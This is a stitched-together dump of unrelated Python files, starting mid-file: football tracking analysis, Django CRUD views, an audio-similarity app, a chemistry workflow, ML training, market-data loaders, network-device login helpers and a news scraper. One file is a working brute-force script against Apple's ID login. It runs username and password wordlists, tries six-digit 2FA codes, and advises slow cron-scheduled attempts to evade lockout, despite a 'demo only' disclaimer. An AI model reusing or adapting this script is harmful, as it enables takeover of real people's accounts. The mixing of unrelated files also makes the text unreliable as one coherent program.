on_ball_frames: set of frames when the selected team was in possession of the ball (i.e. attacking).
off_ball_frames: set of frames when the selected team had not the possession (i.e. defending).
"""
df_events_simple = self.df_events[~self.df_events.Type.isin(["CHALLENGE", "CARD"])].reset_index(drop=True)
possession_start_events = ['PASS', 'RECOVERY', 'SET PIECE', 'SHOT']
possession_change_events = ["BALL LOST", "BALL OUT"]
current_window_start = self.df_events[self.df_events["Subtype"] == "KICK OFF"].iloc[0]["Start Frame"]
on_ball_frames = set()
off_ball_frames = set()
for event_index, row in df_events_simple.iterrows():
event_type = row["Type"]
if event_type in possession_change_events:
current_window_end = row["Start Frame"] if event_type == "BALL OUT" else row["End Frame"]
next_starts = df_events_simple[(df_events_simple.index > event_index) &
(df_events_simple.index <= event_index + 10) &
(df_events_simple["Type"].isin(possession_start_events))]
if next_starts.shape[0] > 0:
next_start = next_starts.iloc[0]
frames_set = on_ball_frames if row["Team"] == self.team_name else off_ball_frames
frames_set.update(range(current_window_start, current_window_end))
current_window_start = next_start["Start Frame"]
return on_ball_frames, off_ball_frames
def prepare_data(self):
"""
Prepares the five pandas DataFrames that 'draw_pass_map' needs.
"""
df_passes = self.df_events[(self.df_events["Type"] == "PASS") &
(self.df_events["Team"] == self.team_name) &
(self.df_events["Minute"] < self.num_minutes)].copy()
df_passes = df_passes.rename(columns={"Start X": "origin_pos_x", "Start Y": "origin_pos_y"})
# In this type of plot, both the size and color (i.e. value) mean the same: number of passes
self.player_pass_value = df_passes.groupby("From").size().to_frame("pass_value")
self.player_pass_count = df_passes.groupby("From").size().to_frame("num_passes")
# 'pair_key' combines the names of the passer and receiver of each pass (sorted alphabetically)
df_passes["pair_key"] = df_passes.apply(lambda x: "_".join(sorted([x["From"], x["To"]])), axis=1)
self.pair_pass_value = df_passes.groupby("pair_key").size().to_frame("pass_value")
self.pair_pass_count = df_passes.groupby("pair_key").size().to_frame("num_passes")
# In this type of plot, instead of averaging the location of the pass origins, we use tracking data
# to compute player's average location
df_tracking = self.df_tracking[(self.df_tracking.index < df_passes["End Frame"].max())]
x_columns = [col for col in df_tracking.columns if col.endswith("_x") and col != "ball_x"]
y_columns = [col for col in df_tracking.columns if col.endswith("_y") and col != "ball_y"]
# Different filters are applied depending on the customization chosen in the command line arguments
if self.context == "attacking":
frames, _ = self._context_frames()
df_tracking = df_tracking[df_tracking.index.isin(frames)]
self.plot_name = "{0}_{1}".format(self.plot_name, self.context)
elif self.context == "defending":
_, frames = self._context_frames()
df_tracking = df_tracking[df_tracking.index.isin(frames)]
self.plot_name = "{0}_{1}".format(self.plot_name, self.context)
if self.half:
match_start = self.df_events[self.df_events["Subtype"] == "KICK OFF"].iloc[0]["Start Frame"]
mean_x = self.df_tracking.loc[self.df_tracking.index == match_start, x_columns].mean().mean()
if self.half == "own_half":
if mean_x < 0.5:
df_tracking = df_tracking[df_tracking["ball_x"] < 0.5]
else:
df_tracking = df_tracking[df_tracking["ball_x"] >= 0.5]
self.plot_name = "{0}_{1}".format(self.plot_name, self.half)
else:
if mean_x < 0.5:
df_tracking = df_tracking[df_tracking["ball_x"] >= 0.5]
else:
df_tracking = df_tracking[df_tracking["ball_x"] < 0.5]
self.plot_name = "{0}_{1}".format(self.plot_name, self.half)
df_pos_x = pd.melt(df_tracking, id_vars=[], value_vars=x_columns)
df_pos_x["player"] = df_pos_x.variable.apply(lambda x: x[:-2])
df_pos_x = df_pos_x.groupby("player").agg({"value": "median"})
df_pos_x = df_pos_x.rename(columns={"value": "origin_pos_x"})
df_pos_y = pd.melt(df_tracking, id_vars=[], value_vars=y_columns)
df_pos_y["player"] = df_pos_y.variable.apply(lambda x: x[:-2])
df_pos_y = df_pos_y.groupby("player").agg({"value": "median"})
df_pos_y = df_pos_y.rename(columns={"value": "origin_pos_y"})
player_position = df_pos_x.merge(df_pos_y, left_index=True, right_index=True)
player_position.index = player_position.index.map(lambda x: "Player{0}".format(x.split("_")[-1]))
self.player_position = player_position |
'''
/django_api/pitch/views.py
-------------------------
Organize the views of pitch
'''
import json
from django.http import JsonResponse
from django_api.world_week.pitch.models import Pitch
def all_scores(request):
if request.method == 'GET':
all_pitchs = list(Pitch.objects.all())
scores = []
for i in all_pitchs:
tmp = {}
tmp['id'] = i.id
tmp['name'] = i.name
tmp['isPart'] = i.isPart
tmp['isFini'] = i.isFini
tmp['isFreeze'] = i.isFreeze
tmp['number'] = i.number
tmp['number_2'] = i.number_2
tmp['number_3'] = i.number_3
tmp['number_4'] = i.number_4
tmp['number_5'] = i.number_5
tmp['number_6'] = i.number_6
tmp['time'] = i.time
tmp['p_score'] = i.p_score
tmp['comment'] = i.comment
scores.append(tmp)
        if len(all_pitchs) > 0:
return JsonResponse({
'code': 200,
'msg': 'get all information successfully',
'data': {
'total': len(scores),
'infos': scores
}
})
else:
return JsonResponse({'code': 200, 'msg': 'Empty table!'})
def one_score(request):
if request.method == 'GET':
id = request.GET.get('id',default=0)
name = request.GET.get('name',default='')
        if id != 0:
            pitch_1 = Pitch.objects.filter(id=id)[0]
        elif name != '':
            pitch_1 = Pitch.objects.filter(name=name)[0]
        else:
            return JsonResponse({
                'code': 3005,
                'msg': 'Parameters do not meet the requirements!'
            })
info = {'id': pitch_1.id, 'name': pitch_1.name, 'isFini': pitch_1.isFini,
'isPart': pitch_1.isPart, 'isFreeze': pitch_1.isFreeze, 'number': pitch_1.number, 'number_2': pitch_1.number_2,
'number_3': pitch_1.number_3, 'number_4': pitch_1.number_4, 'number_5': pitch_1.number_5, 'number_6': pitch_1.number_6,
'p_score': pitch_1.p_score, 'time': pitch_1.time, 'comment': pitch_1.comment}
return JsonResponse({
'code': 200,
'msg': 'Get information successfully',
'data': {
'info': info
}
})
def add_score(request):
if request.method == 'POST':
received_json_data = json.loads(request.body)
rec = received_json_data
pitch_1 = Pitch(name=rec['name'], isPart=rec['isPart'], isFini=rec['isFini'], isFreeze=rec['isFreeze'],
number=rec['number'], number_2 = rec['number_2'], number_3 = rec['number_3']
,number_4 = rec['number_4'], number_5 = rec['number_5'], number_6 = rec['number_6'],
time=rec['time'], p_score=rec['p_score'], comment=rec['comment'])
pitch_1.save()
return JsonResponse({
'code': 200,
'msg': 'Add Successfully!',
'data':{
'name': rec['name']
}
})
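# Example request body for add_score (illustrative values only; the exact field types
# depend on the Pitch model, which is not shown here):
# {
#     "name": "Team A", "isPart": true, "isFini": false, "isFreeze": false,
#     "number": 1, "number_2": 2, "number_3": 3, "number_4": 4,
#     "number_5": 5, "number_6": 6,
#     "time": "2021-06-01 10:00", "p_score": 87.5, "comment": "demo"
# }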
def update_score(request):
if request.method == 'PUT':
received_json_data = json.loads(request.body)
rec = received_json_data
pitch_1 = Pitch.objects.get(id = rec['id'])
pitch_1.name=rec['name']
pitch_1.isPart=rec['isPart']
pitch_1.isFini=rec['isFini']
pitch_1.isFreeze=rec['isFreeze']
pitch_1.number=rec['number']
pitch_1.number_2 = rec['number_2']
pitch_1.number_3 = rec['number_3']
pitch_1.number_4 = rec['number_4']
pitch_1.number_5 = rec['number_5']
pitch_1.number_6 = rec['number_6']
pitch_1.time=rec['time']
pitch_1.p_score=rec['p_score']
pitch_1.comment=rec['comment']
pitch_1.save()
return JsonResponse({
'code': 200,
'msg': 'Update Successfully!',
'data':{
'name': rec['name']
}
})
else:
return JsonResponse({
'code': 500,
'msg': 'Update Failed, incorrect request method!'
})
def p_score_delete_byId(request):
try:
id = request.GET.get('id')
except:
pass
if id:
print(id)
Pitch.objects.filter(id=id).delete()
return JsonResponse({
'code': 200,
'msg': 'Delete successfully!',
})
else:
return JsonResponse({
'code': 404,
'msg': 'Delete failed!'
}) |
#!/usr/bin/env python3
# Written by Sem Voigtlander (@userlandkernel)
# Licensed under the MIT License
# Apple if you are monitoring this, please add anti-bot verification to your identity service provider (eg: captcha!)
import os
import sys
import argparse
import requests
import time
import datetime
from bs4 import BeautifulSoup as Soup
class AppleBrutus:
def __init__(self):
self.tstart = datetime.datetime.now()
# Session to keep cookies etc
self.s = requests.Session()
# Identity Service provider
self.ids = "https://idmsa.apple.com/IDMSWebAuth/login?appIdKey=bbddf091a7ff4178d2deda57c73e701096e4cd4b7f97545ed8703b3c46f38461&baseURL=https://portal.apple.com/&path=validateUser%3Faction%3Dlogin%26appId%3D1468%26requestUri"
def attempt(self, environ="PROD", appleid=None, password=None):
# Retrieve the login page content
loginpage = self.s.get(self.ids, allow_redirects=True)
# If the status isn't HTTP_OK something must be wrong with the application
if loginpage.status_code != 200:
raise BaseException("Login page returned error")
# Find the login
soup = Soup(loginpage.text, "html.parser")
form = soup.find("form", {"name":"form2"}) # Login form is named form2
# Automatically retrieve fields and set post data for requests
formdata = dict()
for element in form.find_all("input"):
try:
formdata[element["name"]] = element["value"]
except Exception as exc:
pass
# Set the username and password
if not appleid:
appleid = str(input("APPLE ID: "))
if not password:
password = str(input("PASSWORD: "))
formdata["appleId"] = appleid
formdata["accountPassword"] = password
# Apparently you can log into dev account
formdata["ENV"] = environ
# Authenticate with Apple
print("[{}]: TRYING {}...".format(appleid, password))
authres = self.s.post("https://idmsa.apple.com/IDMSWebAuth/authenticate", data=formdata, allow_redirects=True)
# Check if login failed
if "Your account information was entered incorrectly" in authres.text:
print("WRONG PASSWORD")
return 1
elif "Your Apple ID or password was entered incorrectly" in authres.text:
print("ACCOUNT DOES NOT EXIST")
return 2
# Check if 2FA code is required
elif "Verify your identity" in authres.text:
print("PASSWORD FOUND: {}".format(password))
print("TWO FACTOR")
# Find form for 2FA code
soup = Soup(authres.text, "html.parser")
twofactor = soup.find("form", {"id":"command"}) # 2FA code form has HTML id 'command'
# Brute force the digits
for i in range(0, 1000000):
code = str(i) # Cast to string so we can add prefix of zeroes if needed
# Add prefix if needed
while len(code) < 6:
code = "0"+code
# Set value of the digit input fields to corresponding digit from bruteforce
for n in range(0, 5):
formdata['digit'+str(i+1)] = code[n]
print("Trying {}".format(code), end=": ")
# Try 2-FA code
twofalogin = self.s.post("https://idmsa.apple.com/IDMSWebAuth/"+twofactor['action'], data=formdata, allow_redirects=True)
if "Unauthorized access detected" in twofalogin.text:
print("UNAUTHORIZED ACCESS DETECTED")
break # Just give up, they caught us
else:
break
#print(twofalogin.text)
elif "This Apple ID has been locked for security reasons" in authres.text:
print("APPLE ID BLOCKED :(")
return 2
else:
print(authres.text)
print("SUCCESS")
return 0
def brute(self, userfile=None, passfile=None):
users = None
passwords = None
if userfile:
users = open(userfile, 'r', errors='replace').read().splitlines()
if passfile:
passwords = open(passfile, 'r', errors='replace').read().splitlines()
# Bruteforce
if users and passwords:
for user in users:
if user == "":
continue
for password in passwords:
r = self.attempt(appleid=user, password=password)
if r == 2:
print("Skipping {}".format(user))
break
# Just regular login
else:
self.attempt()
print("")
print("BRUTEFORCE COMPLETED IN: {} seconds".format(int((datetime.datetime.now() - self.tstart).total_seconds())))
print("")
if __name__ == "__main__":
# Parse arguments
parser = argparse.ArgumentParser()
parser.add_argument('userlist', help='Path to wordlist containing usernames to test', nargs='?')
parser.add_argument('passlist', help='Path to wordlist containing passwords to test e.g: rockyou.txt', nargs='?')
args = parser.parse_args()
# Initialize brute forcer
brutus = AppleBrutus()
print("NOTICE:")
print("THIS PROGRAM IS NOT INTENDED FOR HARMFUL PURPOSES AND IS WRITTEN TO DEMO HOW TO CONDUCT A BRUTEFORCE ATTACK")
print("TRYING MILLIONS OF PASSWORDS LEADS TO BLOCKING THE ACCOUNT")
print("")
print("RECOMMENDED STRATEGY: CRON JOB RUNNING EACH FEW HOURS TO TRY FEW PASSWORDS EVERY DAY PER ACCOUNT")
print("ONLINE ATTACKS OFTEN REQUIRE THIS APPROACH!!!")
print("")
print("APPLE ACCOUNTS MAY BE ROTECTED WITH 2FA")
print("THE SCRIPT SUPPORTS 2FA BRUTEFORCE BUT IT IS NOT EFFECTIVE, FOR DEMO ONLY")
print("")
print("TIM COOK, IF U READ THIS: PLEASE ADD CAPTCHA!!!")
print("")
print("Initiating bruteforce............")
# Conduct bruteforce
brutus.brute(userfile=args.userlist, passfile=args.passlist)
|
from re import search
from PyQt5 import QtCore, QtGui, QtWidgets
from PyQt5.QtWidgets import QMessageBox
from numpy.core.numeric import count_nonzero
from app import Ui_MainWindow
import sys
import os
import librosa
import librosa.display
from librosa.core import load
from pydub import AudioSegment
from tempfile import mktemp # To convert mp3 to wav
import pylab
import numpy as np
import matplotlib.pyplot as plt
from song import *
import pandas as pd
from difflib import SequenceMatcher
from imagehash import hex_to_hash
data = pd.read_csv('hashdata.csv')
songfeats=[0,0,0,0]
diffvalue=[0,0,0,0]
# self.results=[]
class ApplicationWindow(QtWidgets.QMainWindow):
def __init__(self):
super(ApplicationWindow, self).__init__()
self.ui = Ui_MainWindow()
self.ui.setupUi(self)
self.DisableMixer()
self.ui.File1_Browse.clicked.connect(lambda:self.readsignal(0))
self.ui.File2_Browse.clicked.connect(lambda:self.readsignal(1))
self.ui.Search.clicked.connect(lambda:self.similarity())
self.ui.mixer.valueChanged.connect(self.mixer)
self.ui.mixer.setTracking(False)
self.ui.mixer.setMaximum(100)
self.ui.mixer.setMinimum(0)
self.ui.mixer.setSingleStep(1)
self.ui.mixer.setValue(0)
self.results=[]
newfeats=[]
self.paths=[None,None]
def readsignal(self,songnum):
        self.fname = QtWidgets.QFileDialog.getOpenFileName(self, 'Open File', os.getenv('HOME'), "mp3(*.mp3) ;; wav(*.wav)")
self.path=self.fname[0]
if songnum ==0 :
print(self.results)
self.paths[0]=self.path
self.ui.name_song1.setText(os.path.splitext(os.path.basename(self.path))[0]) #to write song name
self.song1 = song(self.path)
hashedd= self.song1.feature1()
print(hashedd)
print(self.song1.loadfs())
print("file1 read done")
elif songnum ==1 :
print(self.results)
self.paths[1]=self.path
self.ui.name_song2.setText(os.path.splitext(os.path.basename(self.path))[0])
self.EnableMixer()
self.song2 = song(self.path)
hashedd= self.song2.feature1()
print(self.song2.loadfs())
print(hashedd)
print("file2 read done")
def DisableMixer(self):
self.ui.mixer.setEnabled(False)
def EnableMixer(self):
self.ui.mixer.setEnabled(True)
def mixer(self) :
self.slider = self.ui.mixer.value()/100
self.path1= self.paths[0]
self.path2= self.paths[1]
self.song11= song(self.path1)
self.song22= song(self.path2)
self.mixedsong= self.song11.mix(self.song22, self.slider)
mixfeat1= self.mixedsong.feature1()
# print(type(mixfeat1))
print(mixfeat1)
def hammingcheck(self,s1,s2):
return hex_to_hash(s1) - hex_to_hash(s2)
def findsimilarto(self,feat1, feat2, feat3):
self.results=[]
newfeats=[0,feat1, feat2, feat3]
for i in range(len(data)):
songname2=data.iloc[i,0]
for j in range(1,4):
songfeats[j]=data.iloc[i,j]
                diffvalue[j] = 1 - (hex_to_hash(str(newfeats[j])) - hex_to_hash(str(songfeats[j]))) / 256.0
print(newfeats)
print(songfeats)
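            # Average the three per-feature similarities and express them as a
            # percentage: (d1 + d2 + d3) / 3 * 100 == (d1 + d2 + d3) / 0.03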
similarity= (diffvalue[1]+diffvalue[2]+diffvalue[3])/0.03
self.results.append((songname2,(similarity)))
self.results.sort(key= lambda x: x[1], reverse=True)
self.ui.tableWidget.setColumnCount(2)
self.ui.tableWidget.setRowCount(10)
for i in range(10):
self.ui.tableWidget.setItem(i,0,QtWidgets.QTableWidgetItem(self.results[i][0]))
self.ui.tableWidget.setItem(i,1,QtWidgets.QTableWidgetItem(str((self.results[i][1]))+"%"))
def similarity(self):
        if (self.paths[0] is not None) and (self.paths[1] is not None):
self.slider = self.ui.mixer.value()/100
self.song11= song(self.paths[0])
self.song22= song(self.paths[1])
self.mixedsong= self.song11.mix(self.song22, self.slider)
self.findsimilarto(self.mixedsong.feature1(),self.mixedsong.feature2(),self.mixedsong.feature3())
elif (self.paths[0] is not None):
self.thissong1=song(self.paths[0])
self.findsimilarto(self.thissong1.feature1(),self.thissong1.feature2(),self.thissong1.feature3())
elif (self.paths[1] is not None):
self.thissong2=song(self.paths[1])
self.findsimilarto(self.thissong2.feature1(), self.thissong2.feature2(), self.thissong2.feature3())
else:
print("no songs")
if __name__ == "__main__":
app = QtWidgets.QApplication(sys.argv)
application = ApplicationWindow()
application.show()
app.exec_()
|
"""
Configuration for docs
"""
# source_link = "https://github.com/[org_name]/medmanager"
# docs_base_url = "https://[org_name].github.io/medmanager"
# headline = "App that does everything"
# sub_heading = "Yes, you got that right the first time, everything"
def get_context(context):
context.brand_html = "Medical Manager"
|
#!/usr/bin/env python
import sys
import numpy as np
import abipy.abilab as abilab
import abipy.flowtk as flowtk
import abipy.data as abidata
def gs_input(x=0.7, ecut=10, acell=(10, 10, 10)):
"""
This function builds an AbinitInput object to compute the total energy
of the H2 molecule in a big box.
Args:
x: Position of the first Hydrogen along the x-axis in Cartesian coordinates.
The second Hydrogen is located at [-x, 0, 0]
ecut: Cutoff energy in Ha.
acell: Lengths of the primitive vectors (in Bohr)
Returns:
AbinitInput object.
"""
# Build structure from dictionary with input variables.
structure = abilab.Structure.from_abivars(
ntypat=1, # There is only one type of atom.
znucl=1, # Atomic numbers of the type(s) of atom.
natom=2, # There are two atoms.
typat=(1, 1), # They both are of type 1, that is, Hydrogen.
xcart=[-x, 0.0, 0.0, # Cartesian coordinates of atom 1, in Bohr.
+x, 0.0, 0.0], # second atom.
acell=acell, # Lengths of the primitive vectors (in Bohr).
rprim=[1, 0, 0, 0, 1, 0, 0, 0, 1] # Orthogonal primitive vectors (default).
)
# Build AbinitInput from structure and pseudo(s) taken from AbiPy package.
inp = abilab.AbinitInput(structure=structure, pseudos=abidata.pseudos("01h.pspgth"))
# Set value of other variables.
inp.set_vars(
ecut=ecut,
nband=1,
diemac=2.0,
toldfe=1e-6,
prtwf=-1,
iomode=3
)
# Define k-point sampling.
inp.set_kmesh(ngkpt=(1, 1, 1), shiftk=(0, 0, 0))
return inp
def build_flow(options):
"""
Generate a flow to compute the total energy and forces for the H2 molecule in a big box
as a function of the interatomic distance.
Args:
options: Command line options.
Return:
Flow object.
"""
inputs = [gs_input(x=x) for x in np.linspace(0.5, 1.025, 21)]
workdir = options.workdir if (options and options.workdir) else "flow_h2"
return flowtk.Flow.from_inputs(workdir, inputs)
@flowtk.flow_main
def main(options):
"""
This is our main function that will be invoked by the script.
flow_main is a decorator implementing the command line interface.
Command line args are stored in `options`.
"""
return build_flow(options)
if __name__ == "__main__":
sys.exit(main())
|
import pandas as pd
import numpy as np
from sklearn.preprocessing import OneHotEncoder, StandardScaler
from sklearn.model_selection import train_test_split
from sklearn.linear_model import LinearRegression
import pickle
data = pd.read_csv("../data/cleaned_data.csv")
data.drop(['Unnamed: 0', 'Price_m2'], axis=1, inplace=True)
df_features = data.drop(["Price_eur"], axis=1)
num_features = df_features.drop(["City"], axis=1)
# Encoding categorical data
encoder = OneHotEncoder(drop='first', sparse=False)
enc_df = pd.DataFrame(encoder.fit_transform(data[['City']]))
# Scaling numeric data
scaler = StandardScaler()
scaled_data = scaler.fit_transform(num_features)
# Joining scaled and encoded data
features = np.concatenate([scaled_data, enc_df], axis=-1,)
label = data['Price_eur']
X_train, X_test, y_train, y_test = train_test_split(features, label, test_size=0.2, random_state=10)
# Prediction with Linear Regression
clf = LinearRegression()
clf.fit(X_train, y_train)
predicted = clf.predict(X_test)
expected = y_test
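# predicted/expected are available here for model evaluation (e.g.
# sklearn.metrics.r2_score(expected, predicted)); they are not used further below.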
# Saving model to file
with open("clf.pkl", "wb") as f:
pickle.dump(clf, f)
with open("encoder.pkl", "wb") as ohe:
pickle.dump(encoder, ohe)
with open("scaler.pkl", "wb") as sc:
pickle.dump(scaler, sc)
|
import os
import sys
import time
import random
import pandas as pd
import yfinance as yf
from loguru import logger
from tqdm.auto import tqdm
from datetime import datetime
from datetime import timedelta
from finam import Exporter, Market, Timeframe
# TODO
# disabling progress bar
# disabling logs
# directory by default
# other intervals: 5m, 15m, 4h
# update mode
# unit tests
class BarLoader:
"""Data history downloader from yahoofinance, finam and binance.
"""
VALID_INTERVALS = ['1d', '1h']
def __init__(self) -> None:
self.start = datetime.utcnow()-timedelta(days=7)
self.end = datetime.utcnow()
self.interval = '1d'
        logger.add('barloader.log')
logger.add(sys.stdout, level="ERROR")
def yf(self, tickers, start=None, end=None, interval=None, tocsv=True, postfix=None):
"""Download history data from https://finance.yahoo.com/
Args:
tickers (list): list of tickers
start (datetime, optional): Start date. Defaults to None (7 days ago).
end (datetime, optional): End date. Defaults to None (now)
interval (str, optional): Bar timeframe. Defaults to None (1d).
tocsv (bool, optional): Save data to csv file or not. Defaults to True.
If False, data saved to list of dataframes.
postfix (str, optional): Need for some tickers. For example, if you
need RUB/USD pair, ticker would be 'RUB' and postfix 'USD=X'. See ticker
on yahoo finance. Defaults to None.
Returns:
list of dataframes: if tocsv=False array contains list of dataframes,
else list is empty
"""
        if postfix is None:
            postfix = ''
if interval is None:
interval = self.interval
if interval not in self.VALID_INTERVALS:
logger.error(f"Interval {interval} not valid. Available {', '.join(self.VALID_INTERVALS)}")
return
if start is None:
start = self.start.strftime('%Y-%m-%d')
elif interval == '1d':
start = start.strftime('%Y-%m-%d')
else:
start = start.strftime('%Y-%m-%d %H:%M:%S')
if end is None:
end = self.end.strftime('%Y-%m-%d')
elif interval == '1d':
end = end.strftime('%Y-%m-%d')
else:
end = end.strftime('%Y-%m-%d %H:%M:%S')
directory = self.interval
if not os.path.exists(directory):
try:
os.makedirs(directory)
except Exception as e:
logger.error(f"Directory \"{directory}\" creation error: {e}")
tickers_list = []
for ticker in tqdm(tickers):
try:
ticker = ticker + postfix
human_filter = ''.join(filter(str.isalpha, ticker))
logger.info(human_filter)
df = yf.download(ticker, start=start, end=end, interval=interval, progress=False)
if tocsv:
df.to_csv(f".{os.sep}{directory}{os.sep}{human_filter}.csv")
else:
tickers_list.append(df)
except Exception as e:
logger.error(f"Download {ticker} from yahoo finance error: {e}")
return tickers_list
def finam(self, tickers, market=None, start=None, end=None, interval=None, tocsv=True):
"""Download history data from https://www.finam.ru/
Args:
tickers (list): list of tickers
start (datetime, optional): Start date. Defaults to None (7 days ago).
end (datetime, optional): End date. Defaults to None (now)
interval (str, optional): Bar timeframe. Defaults to None (1d).
tocsv (bool, optional): Save data to csv file or not. Defaults to True.
If False, data saved to list of dataframes.
market (str, optional): Need if you download futures. Defaults to None (shares).
Returns:
list of dataframes: if tocsv=False array contains list of dataframes,
else list is empty
"""
if start is None:
start = self.start
else:
start = datetime.strptime(start, '%Y-%m-%d').date()
if end is None:
end = self.end
else:
end = datetime.strptime(end, '%Y-%m-%d').date()
if interval is None or interval == '1d':
directory = '1d'
interval = Timeframe.DAILY
elif interval == '1h':
directory = '1h'
interval = Timeframe.HOURLY
else:
logger.error(f"Interval {interval} not valid")
return
if market == 'futures':
market = Market.FUTURES_ARCHIVE
else:
market = Market.SHARES
if not os.path.exists(directory):
try:
os.makedirs(directory)
except Exception as e:
logger.error("Directory \"{directory}\" creation error: {e}")
tickers_list = []
exporter = Exporter()
for ticker in tqdm(tickers):
try:
logger.info(ticker)
asset = exporter.lookup(code=ticker, market=market)
asset_id = asset[asset['code'] == ticker].index[0]
df = exporter.download(asset_id, market=market, start_date=start, end_date=end, timeframe=interval, delay=random.randint(3,5))
df['<DATE>'] = pd.to_datetime(df['<DATE>'], format='%Y%m%d')
df.drop('<TIME>', axis=1, inplace=True)
columns = {'<DATE>': 'Date', '<OPEN>': 'Open', '<HIGH>': 'High', '<LOW>': 'Low', '<CLOSE>': 'Close', '<VOL>': 'Volume'}
df = df.rename(columns=columns).set_index('Date')
if tocsv:
df.to_csv(f".{os.sep}{directory}{os.sep}{ticker}.csv")
else:
tickers_list.append(df)
time.sleep(random.randint(3, 5))
except Exception as e:
logger.error(f"Download {ticker} from finam error: {e}")
return tickers_list
def binance(self, tickers, client, start=None, end=None, interval=None, tocsv=True):
"""Download history data from https://www.binance.com
Args:
client (binance.client.Client class): binance api client https://github.com/sammchardy/python-binance
tickers (list): list of tickers
start (datetime, optional): Start date. Defaults to None (7 days ago).
end (datetime, optional): End date. Defaults to None (now)
interval (str, optional): Bar timeframe. Defaults to None (1d).
tocsv (bool, optional): Save data to csv file or not. Defaults to True.
If False, data saved to list of dataframes.
Returns:
list of dataframes: if tocsv=False array contains list of dataframes,
else list is empty
"""
        if start is None:
            start = self.start.strftime('%Y-%m-%d %H:%M:%S')
        else:
            start = start.strftime('%Y-%m-%d %H:%M:%S')
        if end is None:
            end = self.end.strftime('%Y-%m-%d %H:%M:%S')
        else:
            end = end.strftime('%Y-%m-%d %H:%M:%S')
        if interval is None:
            interval = self.interval
if interval not in self.VALID_INTERVALS:
logger.error(f"Interval {interval} not valid")
return
directory = interval
if not os.path.exists(directory):
try:
os.makedirs(directory)
except Exception as e:
logger.error("Directory \"{directory}\" creation error: {e}")
# download data
tickers_list = []
for ticker in tqdm(tickers):
try:
logger.info(ticker)
df = pd.DataFrame()
lines = []
for kline in client.get_historical_klines_generator(ticker, interval, start, end):
lines.append(kline)
# convert list of lists to dataframe
df = pd.DataFrame(lines)
df.columns=['dateTime', 'open', 'high', 'low', 'close', 'volume',
'closeTime', 'quoteAssetVolume', 'numberOfTrades',
'takerBuyBaseVol', 'takerBuyQuoteVol', 'ignore']
df.dateTime = pd.to_datetime(df.dateTime, unit='ms').dt.strftime('%Y-%m-%d %H:%M:%S')
df.set_index('dateTime', inplace=True)
# delete some unuseful columns
df = df.drop(['closeTime', 'quoteAssetVolume', 'numberOfTrades',
'takerBuyBaseVol','takerBuyQuoteVol', 'ignore'], axis=1)
# save to file
if tocsv:
df.to_csv(f".{os.sep}{directory}{os.sep}{ticker}.csv")
else:
tickers_list.append(df)
except Exception as e:
logger.error(f"Download {ticker} from binance error: {e}")
return tickers_list
if __name__ == '__main__':
# usage examples
bl = BarLoader()
# finam shares
f = bl.finam(['GAZP', 'SBER'], tocsv=False)
print(f)
# yahoo finance
bl.yf(['AAPL', 'TSLA'])
# finam futures
bl.finam(['Si', 'RTS'], market='futures')
    # binance
from binance.client import Client
api_key = 'your api key'
api_secret = 'your api secret'
client = Client(api_key, api_secret)
b = bl.binance(['BTCUSDT', 'BNBETH'], client=client)
# use saved tickers
from barloader import tickers as t
bl.yf(t.usetf)
bl.finam(t.rufutures, market='futures')
bl.yf(t.currency, postfix=t.currency.yf_postfix)
# custom parameters
start = datetime(2019, 1, 1)
end = datetime(2019, 2, 1)
interval = '1h'
bl.yf(t.usetf, start=start, end=end, interval=interval)
bl.finam(t.rufutures, market='futures', start=start, end=end, interval=interval)
bl.yf(t.currency, postfix=t.currency.yf_postfix, start=start, end=end, interval=interval)
# short notation of custom parameters
bl.start = datetime(2019, 1, 1)
bl.end = datetime(2019, 2, 1)
bl.interval = '1h'
bl.yf(t.usetf)
bl.finam(t.rufutures, market='futures')
bl.yf(t.currency, postfix=t.currency.yf_postfix)
|
from netmiko import ConnectHandler, ssh_exception
def netmiko(host: str = None, username: str = None, password: str = None) -> object:
"""Logs into device and returns a connection object to the caller. """
credentials = {
'device_type': 'cisco_ios',
'host': host,
'username': username,
'password': password,
'session_log': 'my_file.out'}
try:
device_connect = ConnectHandler(**credentials)
except ssh_exception.AuthenticationException:
raise ConnectionError("Could not connect to device {}".format(host))
return device_connect
def netmiko_w_enable(host: str = None, username: str = None, password: str = None, **enable) -> object:
"""Logs into device and returns a connection object to the caller. """
try:
credentials = {
'device_type': 'cisco_asa',
'host': host,
'username': username,
'password': password,
'secret': enable["enable_pass"],
'session_log': 'my_file.out'}
try:
device_connect = ConnectHandler(**credentials)
except ssh_exception.AuthenticationException:
raise ConnectionError("Could not connect to device {}".format(host))
return device_connect
except KeyError:
pass
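# Minimal usage sketch (hypothetical host and credentials, not part of this module):
#   conn = netmiko(host="192.0.2.1", username="admin", password="secret")
#   print(conn.send_command("show version"))
#   conn.disconnect()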
|
from __future__ import unicode_literals, print_function
from bs4 import BeautifulSoup
from scraper import AbsractScraper, RssFeed
import time
FOX_Latest = 'http://feeds.foxnews.com/foxnews/latest?format=xml'
FOX_Politics = 'http://feeds.foxnews.com/foxnews/politics?format=xml'
FOX_Science = 'http://feeds.foxnews.com/foxnews/science?format=xml'
FOX_Sports = 'http://feeds.foxnews.com/foxnews/sports?format=xml'
FOX_Tech = 'http://feeds.foxnews.com/foxnews/tech?format=xml'
FOX_National = 'http://feeds.foxnews.com/foxnews/national'
FOX_World = 'http://feeds.foxnews.com/foxnews/world'
FOX_Business = 'http://feeds.foxnews.com/foxnews/business'
FOX_SciTech = 'http://feeds.foxnews.com/foxnews/scitech'
FOX_Health = 'http://feeds.foxnews.com/foxnews/health'
FOX_Entertainment = 'http://feeds.foxnews.com/foxnews/entertainment'
FOX_Views = 'http://feeds.foxnews.com/foxnews/views'
FOX_Blogs = 'http://feeds.foxnews.com/foxnews/foxblogs'
# Columns
FOX_MikeStrakaGrrr = 'http://feeds.foxnews.com/foxnews/column/grrr'
FOX_PopTarts = 'http://feeds.foxnews.com/foxnews/column/poptarts'
FOX_411 = 'http://feeds.foxnews.com/foxnews/column/fox411'
_ALLFEEDS = [
FOX_Latest,
FOX_Politics,
FOX_Science,
FOX_Sports,
FOX_Tech,
FOX_National,
FOX_World,
FOX_Business,
FOX_SciTech,
FOX_Health,
FOX_Entertainment,
FOX_Views,
FOX_Blogs,
FOX_MikeStrakaGrrr,
FOX_PopTarts,
FOX_411
]
class FoxScraper(AbsractScraper):
'''Scraper for Fox news articles.'''
def __init__(self, *args, **kwargs):
super(FoxScraper, self).__init__(*args, **kwargs)
# Number of requests before clearing cookies
self.count = self.max_count = 5
def get_article_text(self, url):
"""Scrape the article text.
Args:
url: The article url.
Returns:
A string.
"""
self.browser.get(url)
soup = BeautifulSoup(self.browser.page_source, "html.parser")
article = soup.select('div.article-body')
text = []
for a in article:
paragraphs = a.find_all('p')
for p in paragraphs:
text.append(p.text)
